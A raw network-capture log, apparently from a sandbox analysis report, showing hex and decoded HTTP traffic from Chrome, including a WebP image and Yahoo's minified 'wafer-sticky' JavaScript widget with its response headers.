                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RIFFTWEBPVP8 Tn*>y4G$,pfnHb]eW']8_?w?qo^w_}x>1#.sp?7+o?D7O?~\O<7w_x?Q=K=qVG_?w~Qt/&h[hjz?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 95 ef 28 f4 c8 78 06 0b 72 f6 15 df df 39 b4 6b 55 4f e1 37 09 da f1 a0 e4 75 3b fe 03 0e c2 82 80 7b ff 4d f7 32 f1 8d aa 99 dd 10 39 56 1e 26 19 47 e5 bf 60 76 93 2a d6 aa 4c c4 73 17 9d c5 e8 e3 81 a4 d9 f4 4e 12 86 2a 3e ee cb 88 00 42 5e 30 8c 9b 00 be 72 b9 64 33 c6 ff 51 ac 12 cc 15 bc ff 49 11 62 f6 d4 fc 3d 37 35 32 e0 dd f3 1f 62 4f 0c 9a 97 bc e4 60 b1 bf 59 52 37 a9 4c 98 96 09 29 5b da e6 b3 1f 8c 49 42 5a 4c 85 e6 57 c2 7a 03 cc 2c 44 83 6b eb e9 a7 a2 83 84 cc d7 c6 5b f7 f1 da ea 46 70 85 b0 d0 70 9a 8c 85 be 93 18 7d 8b 6d d2 b5 5e 77 08 56 f8 f5 97 d7 2e f0 04 28 01 21 42 06 22 9b 38 4c ad 9a 25 ad b2 94 db d8 3d bb f7 db 64 54 d6 1f e9 b6 56 c9 49 83 67 81 db 05 ae 45 5f 28 92 9e 1f 9d a4 ab fd 44 9c 7d 2c d4 c6 95 49 58 75 82 35 cf 54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (xr9kUO7u;{M29V&G`v*LsN*>B^0rd3QIb=752bO`YR7L)[IBZLWz,Dk[Fpp}m^wV.(!B"8L%=dTVIgE_(D},IXu5T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 0d 42 53 87 86 20 4d 4f b9 67 d6 f3 6c 4b 8e d5 37 1e 3d 9c f6 ed 8b 93 a8 1e d2 0f cd 90 10 53 9e a9 6a 06 5f 78 89 1e 01 28 51 6c 1c 94 45 83 e5 d3 d2 e7 99 d5 57 e9 c3 2e 23 8e 07 37 8d 29 19 e3 b3 85 4d 73 b0 16 cb fc bf 99 12 24 4e 7b 29 38 98 49 c1 cc df 4a d7 8d 1e de 1f ff f4 22 54 47 20 9d 62 24 23 b3 c6 2a 10 78 97 d0 f7 46 8a 6c 9b b1 9f 95 72 c1 ca 44 e6 13 65 82 14 9f 96 33 8c 99 85 df 57 e7 50 41 c7 d4 b7 e0 a7 b7 a4 1c b5 a1 0c c6 3e dd a9 ef 88 53 aa 75 b9 a8 ca 0a 38 8e 2c dc a0 22 d3 4f 82 56 da ce df 61 03 5f 74 4d 65 63 af f0 d8 16 0e 18 45 2d 17 22 09 0a 14 1f 3d f6 80 e0 48 86 ba 89 5c 32 91 ca ed 6a fa ec 60 ff b3 45 b6 83 24 8c 1b 58 b1 08 6f 0c c7 12 76 21 96 f6 33 ca ac bc 46 55 da f8 da 1b 7e 4f 9c fa bb 6e 0b 6f 20 ff 07 db 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: BS MOglK7=Sj_x(QlEW.#7)Ms$N{)8IJ"TG b$#*xFlrDe3WPA>Su8,"OVa_tMecE-"=H\2j`E$Xov!3FU~Ono a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: ab a4 20 d4 6e 7a 58 e0 ce 65 e4 86 a8 d2 1b 53 87 3c 33 2b 4b 1f 58 c6 ab e3 59 e0 de 8e fd 91 bb b6 f8 38 72 6a b8 94 7d 4b c8 b2 fd c4 d8 c0 8c e2 14 62 03 d4 69 c1 24 60 f1 5c 4a 3f ac 58 12 11 e1 bc 8b 43 60 cc d8 63 ce ca fc 4b 91 9d 21 ed 2b 43 6e fb b5 41 cb d1 4c c1 25 6a 7d c1 e3 59 45 c6 62 c3 61 b3 18 5d dd f7 bc 83 53 6a fc 29 3f 00 a4 f8 0a 2a f8 80 1c 08 08 7f 88 21 05 59 ec 5f 15 74 ca 89 92 60 c2 60 62 83 7b cf dc f1 8b 3c 59 54 20 4f a2 c2 ba 92 9f 64 88 94 51 cc 4a 75 8d b9 7b 66 5f 6f 57 8d a5 c5 2e 81 eb d7 77 6d 66 ea e1 dd ea c7 00 8a 11 3a 34 80 3e 4d d0 55 bd 32 d3 79 06 f9 95 52 ca f0 31 84 af 12 d8 2c 31 c4 78 6a 1f 32 6b 4a 15 fe a4 f2 80 c5 75 d5 0e 18 b3 d9 2c 27 17 dd a2 89 34 40 1b f2 11 fc 89 1c 7d 3c da e6 28 9a 5c 5e f7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nzXeS<3+KXY8rj}Kbi$`\J?XC`cK!+CnAL%j}YEba]Sj)?*!Y_t``b{<YT OdQJu{f_oW.wmf:4>MU2yR1,1xj2kJu,'4@}<(\^
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: bf dc fc 1c 82 75 e3 80 d0 1b 42 28 a2 b6 60 a0 1a c8 2a 1e 15 05 e1 0a ff 4f e8 ea 78 ef 4c 86 fd ce 1d 9f 65 36 cc 54 bd 17 89 ef ff 78 ed 3a f5 67 6a f2 ed 77 2d bd 47 b5 ef fd 4a 72 49 8a b2 91 5f 92 33 80 83 2d 79 01 d7 4c cf 95 22 5b e9 0d 84 24 7d 78 7d 0b a7 6e f6 48 37 3f e0 3e 5d 1e 7b 72 ba 40 eb b6 dd 3d 12 02 a3 5f a4 01 f8 55 2e 1a 0a a3 d5 09 20 2d ef cb 65 53 02 c0 e9 ab 67 09 45 1f b8 f4 d4 fa f3 2d 1f bf 3b a8 37 2f 67 55 de 2d 42 69 e2 30 92 ab 03 3a 0c 3e 98 07 4d b8 6e e9 9a 59 0c 21 6d 37 55 52 56 17 f0 f3 40 50 15 4a 0d dc f2 b4 f8 2f 2b 5e 70 83 3a 4b b0 d1 29 8f 0c f8 3e a5 a1 b0 e4 3c ee 65 03 67 51 f5 c5 cb 89 d0 ad eb 16 ce 25 cb 58 0a 74 49 30 4f 7e 4d 86 04 5d 16 78 ed a4 5d 1a 2d 6b a3 29 6f bb 0f e6 8c 83 05 93 e6 c1 f8 ac
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: uB(`*OxLe6Tx:gjw-GJrI_3-yL"[$}x}nH7?>]{r@=_U. -eSgE-;7/gU-Bi0:>MnY!m7URV@PJ/+^p:K)><egQ%XtI0O~M]x]-k)o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 5c a5 9b a2 e9 be df c6 c2 dc a3 5b 8a 3e 90 a4 f3 55 08 55 bb 81 70 3d 1d f3 2e ec 76 95 98 85 6f cf 8d 9c ba 50 c6 3a 01 5b 42 b7 d5 8c 79 3a 94 6d f8 94 39 d4 25 71 53 30 c1 f3 c8 ec 74 2e 3c cd 4f 3b fd 6e aa 12 1a ce 3a 59 dc ba 0f 08 61 54 cf 2d c7 a4 6d f5 d1 f7 22 0d e7 e5 36 77 d7 58 b0 5f 11 09 e4 5c bf 76 f1 ee 22 76 4d 25 fd 81 72 87 7a ee d3 5d d3 3c b1 4c 8f ee a6 e5 0b 28 46 82 11 62 31 9e 3f fd 75 00 bd be 27 fe 96 0a af c7 e7 72 3c 71 9a 9c 30 7c 0e 67 15 dc 80 aa 5b fd fb c9 6c b5 e4 1c 92 15 ab d8 ce 10 3f d2 ca 21 c6 c5 b3 2d 78 52 02 a3 e3 33 93 47 91 bd 92 a0 cb aa a8 44 05 58 6f 08 06 5b f1 5a 14 25 17 ac 54 25 5c 4b f8 b1 dd 73 27 0f 98 70 3d 12 98 3b c2 ed 97 cc 85 ba f7 49 28 93 57 e5 0c 49 33 a0 f6 5e 69 55 86 3a bf 45 b9 5f db
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: \[>UUp=.voP:[By:m9%qS0t.<O;n:YaT-m"6wX_\v"vM%rz]<L(Fb1?u'r<q0|g[l?!-xR3GDXo[Z%T%\Ks'p=;I(WI3^iU:E_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 8e e1 38 33 d4 13 29 c8 d6 fb 38 81 8c ac 16 f1 cc 69 44 dd 0d de b7 ba f7 cc d8 1b ac 11 2a e1 12 47 76 4c f6 3e 86 62 c8 8f d0 00 1b 65 c3 6b 8e c9 34 ec a4 ff 43 45 d8 3b 8e d8 95 b9 92 ec 34 84 20 35 5b ee f0 da cd 8d eb ad 40 15 f2 f0 73 bb 4f 15 d5 71 cb 69 06 c4 73 64 b5 b3 3a 4d f7 61 41 e3 8f 7d 28 76 10 a8 e7 1a fd 66 7f 41 1e d5 57 ac b1 33 a6 c1 d6 64 8c 1b 25 b5 3d b2 12 32 cf 6d 15 b7 44 41 fc 0f 96 c8 0b e4 ac 4c 45 d6 b7 0c 71 f7 48 c7 58 12 e7 3f 35 42 3e df db d5 14 60 8d d1 a3 be 25 10 18 e1 9f af e9 36 91 24 6d dd 2a 8a b9 81 48 ed 5b 19 c6 8d 3b 3b db 76 d1 0d 07 82 c8 82 f4 05 4f a0 d5 11 e9 82 64 2e 39 67 0b d8 fc 6d ff 1c f5 db 28 6a 8c 2d 99 4c 27 6b a0 26 d0 04 47 2f 15 61 19 47 d7 4e 82 87 f0 0b 6d bf 8d 6a 40 68 2e cd 4f 9c d4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 83)8iD*GvL>bek4CE;4 5[@sOqisd:MaA}(vfAW3d%=2mDALEqHX?5B>`%6$m*H[;;vOd.9gm(j-L'k&G/aGNmj@h.O
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 1c 72 0c 3c bb c2 5b 3f bf 8a 4a a8 fa 6e df 05 69 b0 f3 2c 54 2e 4c 39 e9 1a 96 3a 69 31 78 4d 7c 68 a7 91 ea 2f 0a 1c cf 69 14 ef 9f 93 80 5a 88 f8 c4 3e 44 be 2a df 28 99 f5 ae 7e 9d 8f 32 a6 87 48 c8 fa 5c c5 ad 13 56 3c 27 d9 f7 52 fa 5d b6 5f 3c 11 76 48 2f 67 51 29 39 76 89 5f a6 ee 65 88 20 10 87 78 f8 09 b7 b4 44 ae 33 24 16 36 39 06 64 97 9e d3 1e 5f f8 36 d4 88 39 f0 0e a4 d4 b3 76 df 35 4d 7f da 48 90 6e de c4 8b 5a 0b 6e 12 ce e1 84 ad 8f 41 92 c9 76 ea d1 1a 51 6c 82 0f ed af 6b a9 90 7e 77 a6 cd 81 fa 35 3a 39 d8 ca 1c c0 90 06 14 44 a4 6d b7 b2 df 32 76 dd 5f 9f 42 8f be e7 00 ec bc 3d 3d 4f 68 5f c9 e3 0d cd 79 23 4a 18 fb c0 ef 71 ae b9 39 d2 c2 3e 12 cf e1 d9 92 85 9c 8a c3 0f 4f f3 5b 07 b6 01 d3 80 67 40 64 77 f8 f1 2c ad e8 ee 0d d8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r<[?Jni,T.L9:i1xM|h/iZ>D*(~2H\V<'R]_<vH/gQ)9v_e xD3$69d_69v5MHnZnAvQlk~w5:9Dm2v_B==Oh_y#Jq9>O[g@dw,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 4e 55 ec 13 d0 15 f4 99 e6 77 e6 4a c7 b8 78 19 c6 72 08 81 bf 56 15 c4 21 a4 61 d1 48 b0 6c d0 b8 a2 71 6f 01 20 be 1f d7 32 9d 86 6d 7e 14 d0 a4 6e 79 00 23 f3 e6 94 66 b1 b3 3f 1b 73 10 43 c7 93 fa a7 6c 17 26 ab 82 35 4b 7c 93 a7 e0 bc 78 44 cd 37 58 56 35 42 be 54 9c 1a c0 eb fc 80 68 1e 4e 9e 72 02 7b 87 bf 43 a5 64 f0 2d a6 a4 43 f7 6c f8 22 8a 94 29 b5 52 b2 65 d8 9d 1f c4 82 43 19 18 85 12 c2 78 00 69 41 f8 64 15 b1 95 b5 f4 cf f7 e3 4e d7 6e 47 1c 31 6b 4f ff 48 3f 45 a8 6e 58 7a 59 c6 17 83 f5 8d d3 68 0c 01 fc 7e 9b f6 e2 a3 31 be 56 c4 d9 0b 29 bc 47 88 88 78 55 33 bf 28 2d 76 e7 1d 67 32 b6 81 1a 0a e9 97 ab 0a 87 c2 8c 19 ec c1 6b 3f 4f ca 4d c0 a2 0c f3 8c 17 16 f5 e1 4e 9a d5 82 63 9c e6 5a f5 41 ac b9 4f 9f 4e b2 34 5e cf 3a 80 39 58 e9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: NUwJxrV!aHlqo 2m~ny#f?sCl&5K|xD7XV5BThNr{Cd-Cl")ReCxiAdNnG1kOH?EnXzYh~1V)GxU3(-vg2k?OMNcZAON4^:9X
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 73 c8 42 cf 52 eb fd ef e7 d6 25 bd b8 4a d6 e7 b1 5b 54 c6 3b 52 c0 91 2e 5c c1 b6 42 87 8a fe 5e ac 5c 48 6f 4c 30 39 b1 96 32 5a ba 63 8f 81 3d 9b b0 ae dd cd b8 13 fe e4 05 aa a5 4f c0 8e 11 12 2d e0 fa f2 60 8f 72 77 2e 9c 09 5f e1 46 c4 8e e1 a7 e6 35 63 c1 0c 0b 44 2f c6 1b c5 d8 e0 86 ec fc 06 cd 66 14 b9 26 da ba b5 3d a4 ac f0 5a 9c 1c ad 68 35 ac 47 41 1e be f8 2f 5b fd 03 ca fa 12 8d bd 46 d8 ba 4d 96 64 2d a9 9b b8 09 6a 7f 9f a3 7d 4b c6 3b 53 20 82 65 48 80 3c 30 4a 6a 42 db ad 1b dd 8b 45 42 72 1f c5 53 82 28 9a 1e 00 bf 55 22 10 77 1e ec d2 ed 5e fe 18 5f 5f bf c1 2b 6b 8d 32 7b 96 ea ab bf 86 19 f6 8f 05 25 7a 88 b1 9a 6a 31 5b 07 40 da d3 a4 93 e3 18 a1 8a e3 15 34 f6 8f c2 93 0b 69 fc 0e ca fc d7 93 b3 3c f3 1a 5f 18 7b f3 6d 61 0d bd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: sBR%J[T;R.\B^\HoL092Zc=O-`rw._F5cD/f&=Zh5GA/[FMd-j}K;S eH<0JjBEBrS(U"w^__+k2{%zj1[@4i<_{ma


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              147192.168.2.45117087.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC366OUTGET /aaq/wf/wf-sticky-1.2.6-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: mOF9CWEL+JuZw8ExBkgcx7HsRqFdgVKlaMe/VMI7PKVekAxAsvohpdaM/mZcyOU9g+e0x7CA1Wo=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 6Y456P75GECGZQW6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 07:50:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 26 Jan 2024 23:41:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "446c3635a0812f8c988a5e9ca3fc96a2"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: wePfh.HucUka1ChhR.5WzprFG1GPno6V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8787
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 127376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 73 74 69 63 6b 79 22 2c 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 73 74 69 63 6b 79 22 5d 3d 65 28 29 3a 28 74 2e 77 61 66 65 72 3d 74 2e 77 61 66 65 72 7c 7c 7b 7d 2c 74 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 74 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-sticky",[],e):"object"==typeof exports?exports["wafer-sticky"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 26 26 6e 75 6c 6c 21 3d 3d 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 65 29 3b 74 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 65 26 26 65 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 74 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 65 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: unction"!=typeof e&&null!==e)throw new TypeError("Super expression must either be null or a function, not "+typeof e);t.prototype=Object.create(e&&e.prototype,{constructor:{value:t,enumerable:!1,writable:!0,configurable:!0}}),e&&(Object.setPrototypeOf?Obj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 6e 61 6c 6c 79 7b 69 66 28 72 29 74 68 72 6f 77 20 6e 7d 7d 72 65 74 75 72 6e 20 6f 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 3b 69 66 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 6e 20 4f 62 6a 65 63 74 28 65 29 29 72 65 74 75 72 6e 20 74 28 65 2c 6f 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 65 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nally{if(r)throw n}}return o}return function(e,o){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return t(e,o);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),y=function(){function t(t,e){for(var o=0;o<e.lengt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 73 6e 61 6d 65 3a 67 2c 65 6c 65 6d 3a 74 2c 74 61 72 67 65 74 45 6c 65 6d 3a 6c 26 26 28 61 26 26 6d 28 74 2c 61 29 7c 7c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6c 29 7c 7c 74 2c 6f 66 66 73 65 74 42 6f 74 74 6f 6d 3a 76 6f 69 64 20 30 21 3d 3d 62 26 26 62 2c 6f 66 66 73 65 74 4c 65 66 74 3a 76 6f 69 64 20 30 21 3d 3d 76 26 26 76 2c 6f 66 66 73 65 74 52 69 67 68 74 3a 76 6f 69 64 20 30 21 3d 3d 68 26 26 68 2c 6f 66 66 73 65 74 54 6f 70 3a 76 6f 69 64 20 30 21 3d 3d 64 26 26 64 2c 73 74 69 63 6b 79 50 6f 73 69 74 69 6f 6e 3a 63 7d 29 3b 76 61 72 20 6b 3d 73 2e 5f 75 74 69 6c 2e 74 61 72 67 65 74 45 6c 65 6d 2c 5f 3d 6b 2e 73 74 79 6c 65 2c 4f 3d 5f 2e 62 6f 74 74 6f 6d 2c 53 3d 5f 2e 6c 65 66 74 2c 6a 3d 5f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: sname:g,elem:t,targetElem:l&&(a&&m(t,a)||document.body).querySelector(l)||t,offsetBottom:void 0!==b&&b,offsetLeft:void 0!==v&&v,offsetRight:void 0!==h&&h,offsetTop:void 0!==d&&d,stickyPosition:c});var k=s._util.targetElem,_=k.style,O=_.bottom,S=_.left,j=_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 6f 74 79 70 65 29 2c 22 64 65 73 74 72 6f 79 22 2c 74 68 69 73 29 2e 63 61 6c 6c 28 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 61 64 64 53 74 69 63 6b 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 72 65 73 69 7a 65 22 3d 3d 3d 74 2c 6f 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 69 73 53 74 69 63 6b 79 3b 69 66 28 65 7c 7c 21 6f 29 7b 76 61 72 20 72 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 6e 3d 72 2e 62 6f 64 79 43 6c 61 73 73 6e 61 6d 65 2c 73 3d 72 2e 65 6c 65 6d 2c 61 3d 72 2e 6f 66 66 73 65 74 4c 65 66 74 2c 6c 3d 72 2e 6f 66 66 73 65 74 52 69 67 68 74 2c 63 3d 72 2e 6f 66 66 73 65 74 54 6f 70 2c 66 3d 72 2e 73 74 69 63 6b 79 50 6f 73 69 74 69 6f 6e 2c 75 3d 72 2e 74 61 72 67 65 74 45 6c 65 6d 2c 79 3d 7b 7d 3b 69 66 28 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: otype),"destroy",this).call(this)}},{key:"addSticky",value:function(t){var e="resize"===t,o=this._state.isSticky;if(e||!o){var r=this._util,n=r.bodyClassname,s=r.elem,a=r.offsetLeft,l=r.offsetRight,c=r.offsetTop,f=r.stickyPosition,u=r.targetElem,y={};if(o
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 73 74 61 74 65 2e 69 73 53 74 69 63 6b 79 3d 21 31 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 6f 2e 73 74 79 6c 65 2c 74 68 69 73 2e 5f 73 74 61 74 65 2e 70 72 65 76 69 6f 75 73 50 6f 73 69 74 69 6f 6e 56 61 6c 75 65 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 63 6f 6e 66 69 67 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 65 3d 74 2e 6f 66 66 73 65 74 42 6f 74 74 6f 6d 2c 6f 3d 74 2e 6f 66 66 73 65 74 54 6f 70 2c 69 3d 74 2e 73 74 69 63 6b 79 41 6c 6c 6f 77 65 64 2c 72 3d 74 2e 74 61 72 67 65 74 45 6c 65 6d 3b 72 65 74 75 72 6e 7b 69 73 53 74 69 63 6b 79 3a 74 68 69 73 2e 5f 73 74 61 74 65 2e 69 73 53 74 69 63 6b 79 2c 6f 66 66 73 65 74 42 6f 74 74 6f 6d 3a 65 2c 6f 66 66 73 65 74 54 6f 70 3a 6f 2c 73 74 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: state.isSticky=!1,Object.assign(o.style,this._state.previousPositionValue)}}},{key:"config",get:function(){var t=this._util,e=t.offsetBottom,o=t.offsetTop,i=t.stickyAllowed,r=t.targetElem;return{isSticky:this._state.isSticky,offsetBottom:e,offsetTop:o,sti
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC987INData Raw: 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 73 74 61 74 65 2c 65 3d 74 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 6f 3d 74 2e 6d 6f 75 6e 74 65 64 3b 30 21 3d 3d 65 2e 73 69 7a 65 26 26 21 6f 26 26 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 6d 6f 75 6e 74 65 64 3d 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 53 65 6c 66 53 74 69 63 6b 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6f 29 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 2b 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 3e 74 2b 65 2e 5f 73 74 61 74 65 2e 74 61 72 67 65 74 45 6c 65 6d 4f 66 66 73 65 74 54 6f 70 29 72 65 74 75 72 6e 20 76 6f 69 64 20 65 2e 61 64 64 53 74 69 63 6b 79 28 6f 29 3b 65 2e 72 65 6d 6f 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nction(){var t=this._state,e=t.elementInstances,o=t.mounted;0!==e.size&&!o&&(this._state.mounted=!0)}},{key:"handleSelfSticky",value:function(t,e,o){if(window.pageYOffset+window.innerHeight>t+e._state.targetElemOffsetTop)return void e.addSticky(o);e.remov


